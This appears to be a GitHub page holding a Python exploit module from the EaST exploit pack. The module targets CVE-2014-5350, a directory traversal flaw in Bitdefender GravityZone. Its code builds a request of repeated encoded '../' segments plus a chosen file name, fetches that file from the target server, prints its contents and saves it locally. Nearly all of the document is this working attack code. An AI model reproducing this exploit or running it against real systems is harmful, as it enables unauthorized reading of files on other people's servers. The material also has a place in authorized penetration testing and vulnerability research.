Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
101 lines (84 sloc) 3.47 KB
#!/usr/bin/env python
# The exploit is a part of EaST pack - use only under the license agreement
# specified in LICENSE.txt in your EaST distribution
import sys
import urllib2
sys.path.append("./core")
from core.Sploit import Sploit
INFO = {}
INFO['NAME'] = "ef_Bitdefender_GravityZone_dt"
INFO['DESCRIPTION'] = "Bitdefender GravityZone <= 5.1.11.432 Directory Traversal Vulnerability"
INFO['VENDOR'] = "http://bitdefender.com"
INFO["CVE Name"] = "CVE-2014-5350"
INFO["NOTES"] = """
Bitdefender GravityZone lets enterprises control and protect the heterogeneous
environments of today. The solution combines highly optimized virtualization
aware security with leading detection technologies and a fresh, but proven,
architecture. It empowers administrators with features adapted to reduce the
daily security hassle and eliminate the need for point solutions with unified
protection across virtualized, physical, and mobile endpoints. Unlike other
solutions that bolt-on modules to an aging architecture, the GravityZone
Control Center dashboard has been designed specifically to unify monitoring
and security management in a single simple and accessible interface."""
INFO['CHANGELOG'] = "21 Jul 2015. Written by Gleg team."
INFO['PATH'] = 'Exploits/'
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = '127.0.0.1'
OPTIONS["PORT"] = '7074'
OPTIONS["FILENAME"] = ''
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.ssl = True
self.port = port
self.host = host
self.filename = None
self.state = "running"
return
def make_url(self, path = ''):
return '{}{}:{}{}'.format(self.prot(), self.host, self.port, path)
def prot(self):
return self.ssl and 'https://' or 'http://'
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.filename = self.args.get('FILENAME', 'boot.ini')
self.url = self.make_url('/%2e%2e/' * 16 + self.filename)
return
def run(self):
self.args()
self.log('Try download file: {}'.format(self.filename))
self.log('Sending request {}'.format(self.url))
try:
response = urllib2.urlopen(self.url)
data = response.read()
if data.lower().find("no such file or directory") > -1:
self.log('File not found at {}'.format(self.filename))
self.finish(False)
return 0
if data.lower().find("forbidden") > -1:
self.log('File not found at {}'.format(self.filename))
self.finish(False)
return 0
self.log('Found ' + self.filename)
self.log('===Content of file===')
self.log(data)
self.log('=========End=========')
self.writefile(data)
self.finish(True)
return 1
except Exception as ex:
self.log(ex)
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()